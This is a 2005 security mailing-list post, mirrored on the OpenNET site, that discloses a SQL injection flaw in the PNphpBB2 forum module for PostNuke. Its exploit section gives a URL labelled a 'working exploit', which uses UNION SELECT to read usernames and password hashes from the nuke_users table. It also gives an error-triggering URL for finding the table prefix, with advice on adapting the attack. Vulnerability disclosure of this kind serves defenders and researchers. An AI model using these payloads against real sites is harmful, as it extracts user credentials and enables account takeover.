The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Tue, 01 Mar 2005 17:15:27 +0100
From: Jose Pedro Andres <jpandres@sync.es.>
To: [email protected]
Subject: [ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-AntiVirus: scanned for viruses by AMaViS 0.2.1 (http://amavis.org/)
X-Virus-Scanned: antivirus-gw at tyumen.ru

Sin desperdicio alguno....




[Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor]

Author: Jocanor
Date: 01-03-2k5


1. -----------introduction--------.

Postnuke is an open source CMS (content management system), originally 
based in php-nuke. (www.postnuke.com)

pnphpbb is a module for postnuke based in popular forum system phpbb. 
(www.phpbb.com)

2. ------------the bug------------

in 26 -03-04 janek vind discovers a bug in phpbb forums, in prvmsg.php 
file described in the bugtraq id 9984 and the bug affects also to 
php-nuke; butraq privades exploits for exploit this bug in php-nuke and 
phpbb.

But the module Pnphpbb (postnuke phpbb) is also vulnerable to this 
issue, and its easy to exploit:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql 
here]

3 -------- the exploit ----------

Working exploit:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*

Show password hash for the user with uid = 2.

4. ------important notes-----

Note: if don't works, changue the prefix nuke_ for the valid prefix, you 
can get the valid table prefix causing an error like this:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20'


5----- Contact -----

Author: Jocanor
Location: Spain
Email: jocanor [at] gmail [dot] com

JoCaNoR SeCuRiTy ReaSoNS

EOF.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру